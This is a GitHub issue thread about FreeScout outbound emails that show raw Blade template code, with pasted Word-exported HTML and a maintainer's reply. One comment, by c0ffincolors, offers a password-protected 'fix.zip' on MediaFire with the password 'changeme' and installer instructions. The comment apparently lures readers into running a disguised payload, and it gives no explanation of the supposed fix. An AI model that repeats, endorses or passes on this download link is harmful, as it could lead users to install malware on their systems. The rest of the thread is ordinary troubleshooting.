### ISSUE TITLE
sending code on outbound emails not text

### ISSUE THREAD

**Issue by mauriceesp** [freescout-help-desk/freescout#4200]
PHP version: 
FreeScout version: 
Database: MySQL / PostgreSQL
Are you using CloudFlare: Yes / No yes
Are you using non-official modules: Yes / No

we are getting code instead of text when sending outbound.

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">

<head>

<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 15">
<meta name=Originator content="Microsoft Word 15">
<link rel=File-List
href="file:///C:/Users/MAURIC~1.ESP/AppData/Local/Temp/msohtmlclip1/01/clip_filelist.xml">
<link rel=themeData
href="file:///C:/Users/MAURIC~1.ESP/AppData/Local/Temp/msohtmlclip1/01/clip_themedata.thmx">
<link rel=colorSchemeMapping
href="file:///C:/Users/MAURIC~1.ESP/AppData/Local/Temp/msohtmlclip1/01/clip_colorschememapping.xml">

<style>

</style>

</head>

<body lang=EN-US link="#346CC4" vlink="#954F72" style='tab-interval:.5in;
word-wrap:break-word'>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@foreach
($threads as $thread) @if ($loop-&gt;index == 1)</span><o:p></o:p></p>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@endif </span><o:p></o:p></p>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@if
(!$loop-&gt;first) </span><o:p></o:p></p>

{{ $thread->getFromName($mailbox) }}@if ($is_forwarded   && $thread->from) <{{ $thread->from }}>@endif {{--if   ($loop->last){!! __(':person sent a message', ['person' => ''.htmlspecialchars($thread->getFromName($mailbox)).'']) !!}@else {!!   __(':person replied', ['person' => ''.htmlspecialchars($thread->getFromName($mailbox)).'']) !!}@endif--}}    @if ($thread->getCcArray())    Cc: {{ implode(', ', $thread->getCcArray() )}}    @endif | {{   App\Customer::dateFormat($thread->created_at, 'M j, H:i') }}
-- | --

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@endif </span><o:p></o:p></p>

<p class=MsoNormal style='margin-bottom:12.0pt;line-height:14.25pt'><span
lang=EN style='font-size:10.0pt;font-family:"Arial",sans-serif;color:#232323;
mso-ansi-language:EN'>@if ($thread-&gt;source_via == App\Thread::PERSON_USER
&amp;&amp; $mailbox-&gt;before_reply &amp;&amp; $loop-&gt;first) </span><span
lang=EN style='font-size:10.0pt;font-family:"Arial",sans-serif;color:#B5B5B5;
mso-ansi-language:EN'>{{ $mailbox-&gt;before_reply }}</span><span lang=EN
style='font-size:10.0pt;font-family:"Arial",sans-serif;color:#232323;
mso-ansi-language:EN'><br>
<br>
@endif {!! $thread-&gt;body !!} @action('reply_email.before_signature',
$thread, $loop, $threads, $conversation, $mailbox, $threads_count) @if
($thread-&gt;source_via == App\Thread::PERSON_USER &amp;&amp;
\Eventy::filter('reply_email.include_signature', true, $thread)) <br>
{!! $conversation-&gt;getSignatureProcessed(['thread' =&gt; $thread]) !!}
@endif @action('reply_email.after_signature', $thread, $loop, $threads,
$conversation, $mailbox, $threads_count) </span><o:p></o:p></p>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>{{--@if
($loop-&gt;count &gt; 1 &amp;&amp; $loop-&gt;last)</span><o:p></o:p></p>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@endif--}} </span><o:p></o:p></p>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@endforeach @if
(\App\Option::get('email_branding')) </span><o:p></o:p></p>

<p class=MsoNormal style='line-height:13.5pt'><span lang=EN style='font-size:
9.0pt;font-family:"Arial",sans-serif;color:#AAAAAA;mso-ansi-language:EN'>{!!
__('Support powered by :app_name — Free open source help desk &amp; shared
mailbox', ['app_name' =&gt; '<a href="https://landing.freescout.net">'.\Config::get('app.name').'</a>'])
!!} </span><o:p></o:p></p>

<p class=MsoNormal><span lang=EN style='mso-ansi-language:EN'>@endif </span><o:p></o:p></p>

</body>

</html>
@foreach ($threads as $thread) @if ($loop->index == 1)
@endif 
@if (!$loop->first) 
{{ $thread->getFromName($mailbox) }}@if ($is_forwarded && $thread->from) <{{ $thread->from }}>@endif {{--if ($loop->last){!! __(':person sent a message', ['person' => ''.htmlspecialchars($thread->getFromName($mailbox)).'']) !!}@else {!! __(':person replied', ['person' => ''.htmlspecialchars($thread->getFromName($mailbox)).'']) !!}@endif--}} 
@if ($thread->getCcArray()) 
Cc: {{ implode(', ', $thread->getCcArray() )}} 
@endif 	{{ App\Customer::dateFormat($thread->created_at, 'M j, H:i') }}
@endif 
@if ($thread->source_via == App\Thread::PERSON_USER && $mailbox->before_reply && $loop->first) {{ $mailbox->before_reply }}

@endif {!! $thread->body !!} @action('reply_email.before_signature', $thread, $loop, $threads, $conversation, $mailbox, $threads_count) @if ($thread->source_via == App\Thread::PERSON_USER && \Eventy::filter('reply_email.include_signature', true, $thread)) 
{!! $conversation->getSignatureProcessed(['thread' => $thread]) !!} @endif @action('reply_email.after_signature', $thread, $loop, $threads, $conversation, $mailbox, $threads_count) 
{{--@if ($loop->count > 1 && $loop->last)
@endif--}} 
@endforeach @if (\App\Option::get('email_branding')) 
{!! __('Support powered by :app_name — Free open source help desk & shared mailbox', ['app_name' => '['.\Config::get('app.name').'](https://landing.freescout.net/)']) !!} 
@endif

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mauriceesp** [comment]
PHP version:
FreeScout version: \\\1.8.150
Database: MySQL / PostgreSQL: \\\my sql
Are you using CloudFlare: Yes / No\\\ yes
Are you using non-official modules: Yes / No

I see you sent a file , can you explain the reason behind issue and a little about the fix action

**Comment by mauriceesp** [comment]
PHP 8.3.10

**Comment by freescout-help** [comment]
We've never seen such an issue and it's hard to tell what can be the reason. Someone need to check it on your server.
